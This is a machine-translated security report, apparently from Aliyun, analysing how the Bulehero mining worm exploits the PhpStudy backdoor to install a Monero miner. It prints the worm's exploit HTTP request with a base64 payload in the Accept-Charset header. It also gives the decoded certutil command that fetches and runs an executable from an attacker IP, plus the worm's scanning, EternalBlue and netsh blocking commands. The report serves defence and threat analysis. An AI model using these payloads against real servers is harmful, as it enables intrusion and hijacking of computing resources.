Shulou(Shulou.com)06/01 Report--

Overview recently, the Aliyun security team monitored a version upgrade of the Bulehero mining worm. After the upgrade, the worm began to use the latest PHPStudy backdoor vulnerability as a new attack method to attack the Windows host. After a successful attack, the Monroe coin mining program will be downloaded to make a profit. The mining program will wantonly seize the server CPU resources for Monroe coin mining, resulting in server stutter, seriously affect the normal business operation, and even cause business terminals. The worm was first exposed in July 2018. Since its emergence, the worm has been updated frequently and dozens of attack methods have been added one after another. It can be expected that the hacker group will continue to look for new ways of attack to implant its malicious programs. It is recommended that users check their hosts for security vulnerabilities in time, and pay attention to the relevant articles of Aliyun security team. Background the BuleheroBulehero mining worm first appeared in early 2018, first exposed in August 2018, and was named Bulehero because of the earliest use of the bulehero.in domain name. The worm focuses on attacking Windows servers and makes money by implanting malicious mining software. It uses a variety of complex attacks to spread, since the emergence of frequent updates, constantly adding new attacks to their own arsenal. PhpStudy backdoor vulnerability PhpStudy is a free program integration package for PHP debugging environment in China, which has nearly one million PHP language learners and developers in China. On September 20, 2019, it was revealed that there was a "backdoor" in PhpStudy: hackers wrote a "backdoor" file as early as 2016, illegally hacked into PhpStudy's official website, and tampered with the software installation package into the "backdoor". The "backdoor" has the function of remotely controlling the computer, and can remotely control downloading and running scripts to collect users' personal information. It is reported that hackers took advantage of this loophole to illegally control more than 670000 computers and illegally obtained more than 100000 sets of data such as account passwords, chat data, device codes, and so on. The "back door" will not only cause mining and information leakage, but also may be used by the blackmail virus. The key data of the server will not be recovered after being encrypted by the blackmail virus, causing a lot of data and economic losses to the victims. Worm analysis attack behavior analysis the attacker will send an exploiting HTTP GET request to the attacked server. The malicious code exists in the Accept-Charset field of the request header, and the field content is encoded by base64. After decoding, you can find that this is a windows command: download download.exeGET / index.php HTTP/1.1Connection: Keep-AliveAccept: * / * Accept-Charset: c3lzdGVtKCdjZXJ0dXRpbC5leGUgLXVybGNhY2hlIC1zcGxpdCAtZiBodHRwOi8vNjAuMTY0LjI1MC4xNzA6Mzg4OC9kb3dubG9hZC5leGUgJVN5c3RlbVJvb3QlL1RlbXAvZ2Jubm5teXdrdmd3aGZxMTM5OTAuZXhlICYgJVN5c3RlbVJvb3QlL1RlbXAvZ2Jubm5teXdrdmd3aGZxMTM5OTAuZXhlJyk7ZWNobyBtZDUoJ3BocHN0dWR5Jyk7Accept-Encoding: gzip,deflateAccept-Language: zh-cnReferer: http://xxx:80/index.phpUser-Agent: Mozilla/4.0 using the certutil.exe tool (compatible; MSIE 9.0) Windows NT 6.1) Host: xxx decoded content: system ('certutil.exe-urlcache-split-f http://60.164.250.170:3888/download.exe% SystemRoot%/Temp/gbnnnmywkvgwhfq13990.exe &% SystemRoot%/Temp/gbnnnmywkvgwhfq13990.exe'); echo md5 (' phpstudy'); behavior of the infected host

For example, the above figure is the flow chart of the behavior of malicious files on the host. Download.exe is the downloader of Bulehero and downloads a file named ScarupnpLogon.exe. This file will release several packaged malicious files, which can be divided into three modules: mining module, scanning module and attack module. Mining module: this module carries out mining of Monroe currency. In this version, Bulehero does not use a public mining pool for mining, but uses a self-built mining pool agent to distribute mining tasks, so it can avoid exposing the wallet address and prevent the tracking of security researchers. Scanning module: this module scans specific open ports on the Internet and writes the scan results to a file named Result.txt: C:\ Windows\ gstmlepnk\ ntkpmzgif\ uktkebigm.exe-iL C:\ Windows\ gstmlepnk\ ntkpmzgif\ ip.txt-oJ C:\ Windows\ gstmlepnk\ ntkpmzgif\ Result.txt-open-rate 4096-p 445 attack module: this module integrates a variety of exploit tools, reads the scan results and attacks other hosts The following process uses the Eternal Blue vulnerability module to attack. C:\ Windows\ gstmlepnk\ UnattendGC\ specials\ svschost.exe-- InConfig C:\ Windows\ gstmlepnk\ UnattendGC\ specials\ svschost.xml-- TargetIp 106.14.149.128-- TargetPort 445-- DllPayload C:\ Windows\ gstmlepnk\ UnattendGC\ AppCapture64.dll-DllOrdinal 1 ProcessName lsass.exe-- ProcessCommandLine-- Protocol SMB-- Architecture x64-- Function Rundll We compared the sample behavior of Bulehero before the upgrade, and found that its behavior in the host has not changed significantly, and the file package is still downloaded through the download.exe downloader. And release three functional modules. However, in order to hide itself, it changed the way of naming malicious files, camouflaged by confused system file names before upgrade, and all random file paths and file names after upgrade. Although random file names are more likely to expose themselves than obfuscated system file names, the advantage of this strategy is that they can avoid being cleared by other mining viruses through process fingerprints and have an advantage in resource competition. Other behaviors use netsh ipsec security tools to block vulnerable service ports and prevent other competitors from entering. Netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCPnetsh ipsec static add filteraction name=BastardsList action=block modifies the host host to prevent other competitors from hijacking domain names. Cmd / c echo Y | cacls C:\ Windows\ system32\ drivers\ etc\ hosts / T / D users & echo Y | cacls C:\ Windows\ system32\ drivers\ etc\ hosts / T / D administrators & echo Y | cacls C:\ Windows\ system32\ drivers\ etc\ hosts / T / D SYSTEM timeline based on Bulehero's malicious file compilation time and file upload time, we can determine that the Bulehero upgrade time is at 23:00 on October 6th, only two weeks before PhpStudy backdoor exploit exposure. If there are loopholes in the enterprise, remove the National Day holiday in the middle, and there are only a few days left for the repair of the enterprise. Judging from the number of downloads of malicious files, there have been 15,000 downloads before publication, which shows that the worm spreads very fast and causes great destruction.

In addition to the PhpStudy backdoor vulnerability added in this update, Bulehero also uses a variety of attack methods. Here are other known attacks.

IOCs60 [.] 164,250 [.] 170185 [.] 34 fky [.] dfg45dfg45 [.] best uu [.] dfg45dfg45 [.] best uu1 [.] dfg45dfg45 [.] best ox [.] mygoodluck [.] best oo [.] mygoodluck [.] best security suggests that enterprises need to fix the vulnerabilities involved in time, otherwise they are easy to become victims of mining Trojans. It is recommended to use Aliyun Security's next-generation cloud firewall product, which blocks malicious outreach and can configure intelligent policies, which can effectively help prevent intrusion. No matter how clever the attacker is in hiding on the host, downloading, digging, and bouncing shell require malicious outreach; the interception of the cloud firewall will completely block the attack chain. In addition, users can also block the intrusion by directly shielding malicious websites through custom policies. In addition, the unique virtual patch function of the cloud firewall can help customers block attacks more flexibly and without feeling. For users with higher customization requirements, you can consider using Aliyun security butler service. After purchasing the service, experienced security experts will provide consulting services to customize the solution that is suitable for you to help strengthen the system and prevent intrusion. After the intrusion occurs, you can also intervene to directly assist the post-invasion clean-up, event tracing, etc., suitable for users with higher security needs, or enterprises that do not hire security engineers, but want to ensure the security of the system. The author: Sandor

The original link to this article is the original content of Yunqi community and may not be reproduced without permission.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.